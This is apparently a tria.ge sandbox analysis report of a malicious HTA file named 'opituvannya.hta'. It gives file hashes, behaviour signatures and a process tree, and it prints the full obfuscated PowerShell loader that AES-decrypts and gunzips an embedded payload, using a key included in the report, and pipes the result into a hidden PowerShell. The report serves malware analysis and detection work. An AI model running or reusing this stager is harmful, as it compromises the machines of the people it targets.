Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
14/06/2024, 14:02
Static task
static1
Behavioral task
behavioral1
Sample
opituvannya.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
opituvannya.hta
Resource
win10v2004-20240611-en
General
-
Target
opituvannya.hta
-
Size
62KB
-
MD5
c708f14c2f52a4dc08397830f236756c
-
SHA1
4ac6a85dd75482792aaf1bd5926f0fadb3294076
-
SHA256
82f62251ab3149595cbbb8650c9751965643deb0b94bf072378d2995b578d67e
-
SHA512
46c4826e3f06ed0e40f41a9d1ea7f9c355141cf8574f5f7742b47694aa7b9815b1019a952f2be196ee365f89ae2c367c719c680509c74e281d903be63d046a6c
-
SSDEEP
768:knAQQXYSMpqVHKkwIMU+B8sbo11HKZOzfUwM:eAQiYSMpmqk6pBW11HNMwM
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2592 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2592 powershell.exe 2592 powershell.exe 2592 powershell.exe 2648 powershell.exe 2476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2592 2188 mshta.exe 28 PID 2188 wrote to memory of 2592 2188 mshta.exe 28 PID 2188 wrote to memory of 2592 2188 mshta.exe 28 PID 2188 wrote to memory of 2592 2188 mshta.exe 28 PID 2592 wrote to memory of 3060 2592 powershell.exe 30 PID 2592 wrote to memory of 3060 2592 powershell.exe 30 PID 2592 wrote to memory of 3060 2592 powershell.exe 30 PID 2592 wrote to memory of 3060 2592 powershell.exe 30 PID 3060 wrote to memory of 2648 3060 cmd.exe 32 PID 3060 wrote to memory of 2648 3060 cmd.exe 32 PID 3060 wrote to memory of 2648 3060 cmd.exe 32 PID 3060 wrote to memory of 2648 3060 cmd.exe 32 PID 3060 wrote to memory of 2476 3060 cmd.exe 33 PID 3060 wrote to memory of 2476 3060 cmd.exe 33 PID 3060 wrote to memory of 2476 3060 cmd.exe 33 PID 3060 wrote to memory of 2476 3060 cmd.exe 33
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\opituvannya.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell - }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp | powershell -3⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $OrYH = 'AAAAAAAAAAAAAAAAAAAAADkCvmL9BPeiT7j5FHFntpVBTonWV0j9CtjNhVif3l4FEwM1YmdCoCarRAOr9KMAUamrrwz4zDixCguii22J/SXiH22mWewKL37cdXp3c8xgAmUJg3M61JCvhmjElrLRsv/kl/maw4E1glvS0dHWZneFS+4PYKbbsHyPFRoNifGVL7fcfQqqoA17J2qzRwtWEZiNeS1tONXJqnX4mC87oCGna+5FZv8aFhw7tASa0GrFFP/+GuvcRmsDh5Ec0pT6DkCL0aLUwrEh8hH2NbNHISk8szOFEyHif1FTSzEhvFXnqybydixxmjwqvAttKPZJm9iJe8V4HHukoE26h8cNH5BzLFr7puQaQe/D1jnwFDlY8AYT2L5FRSLpOovWkwmdUgQAcBXa/kEaGx/845j56POTgHp3GtcPqr0mNB/W/YojdkksdNeiMg31GhxtAygFWklxn9zujBdYHlUI0izU8lYzXMUx2cmBO2knuMWbWaW3OAmD3s8W/p0kWtJLx0lvFOvUJtItJDNoXvO3X4wylZP3NCUFwg/nhj4qx2IVXJFHBH/+g+h4UvSgwRTL7Nu9OlUauiRPvdFeFjFZ4rP5XQnPQRBH/JtFFNBcwcQpSFb+6lgyi6ttX7MVDY+qsmzME7xYf6oUgRmG+ioaT/0TdhQjz74mcTwhgzEcxyNUapzu/SI0YwDXXkXsACDrxXk2I5U5hz528u2wGEnvZVTvhOFmPABj5giVwHx+CYVNIFubZBPVv3aStSeinJ5ycT3SK/Je+RaFAcZ8SlcAWguuc5OgVvRAcX5dK8VgCcswmbgUpduIfbvt2Ik40+4g+7R/Ay5OUE1vYy7cbX8h+WIZWMJJ+OPXBalEcbzI9fExNqVGa28c9/zitEZgWUiikYHTy+og5r7lspOLBrGHR8USqeAjebGkujOneulUFK0Wsl24UG84KQLA5758N3S9SXjgCf7LY7qyuCc27iixb55tZU7yG5ClZe6sfUJZqsAq+k0mzXVE3niNI1d4Bw56Fpr+HKh4vzMGo36evhjWS+KG9HyyuVO1xJ1XmlhyL5Aej8B73btSStvXebsWSiBsfBmPnomnHvvPTOQaivuP1bcvj/xGGk5+M4MKgSLipz0UC32Qep3Bp7tFAHyARpf2/15pV6+Pwg956ln8xBomGL2DHRs20MpWsIMaEXnLd4lor0ymTVIndcpHPNaly6DrL7TVwi2+30JPQqKDyhxSijvE/WyM12Zuf4/9SJGLg78xdetz2439qM9qVyBDL84v5rQ2DdPI8IIvdELYBg26l2tVdktH7m5RFodmlUSaIFKIgKAw9ISlp78dZBkq5dNw9UZAHPOcJj+wfLojn9nwctWTaSEuqg94i97EuaE20OH0DHw23qthbgTDZm8hOTNymwNe/Icc2lspfAGSNMxdnqDCXxnafZnhQaAT6Bygz5Dft7WVQYeKWKe5Uq4ZKiYkbV9NUQ==';$dHtuiS = 'b0tpdml0akhVWVZmZUpqSHhkTkFFYlFuS3NsVUV5eko=';$FJnOHKSp = New-Object 'System.Security.Cryptography.AesManaged';$FJnOHKSp.Mode = [System.Security.Cryptography.CipherMode]::ECB;$FJnOHKSp.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$FJnOHKSp.BlockSize = 128;$FJnOHKSp.KeySize = 256;$FJnOHKSp.Key = [System.Convert]::FromBase64String($dHtuiS);$KwgMm = [System.Convert]::FromBase64String($OrYH);$JYOJxPKu = $KwgMm[0..15];$FJnOHKSp.IV = $JYOJxPKu;$HvplKVDJO = $FJnOHKSp.CreateDecryptor();$PKmDucvUS = $HvplKVDJO.TransformFinalBlock($KwgMm, 16, $KwgMm.Length - 16);$FJnOHKSp.Dispose();$nXEtI = New-Object System.IO.MemoryStream( , $PKmDucvUS );$xiAyE = New-Object System.IO.MemoryStream;$GyoHARsHW = New-Object System.IO.Compression.GzipStream $nXEtI, ([IO.Compression.CompressionMode]::Decompress);$GyoHARsHW.CopyTo( $xiAyE );$GyoHARsHW.Close();$nXEtI.Close();[byte[]] $xHkGdAr = $xiAyE.ToArray();$AgmPvTp = [System.Text.Encoding]::UTF8.GetString($xHkGdAr);$AgmPvTp4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56b0531ba3462460fd0b88c33e6f11d6d
SHA1bdd2835eb040927a5320a2fa998a3aa4a5ef9d01
SHA25653ec09c0f03b2bba78ae154029cf9c2db4b070af114c129c336171fcca6d65b2
SHA51296faafd1bbaa9535b14962e87e78db1e770ec7b69847aaf0cfca903c286f3016b2667cc4577f0603bbdd787c82dedb330bc6cb6018c30b1b5f85046649e79d3f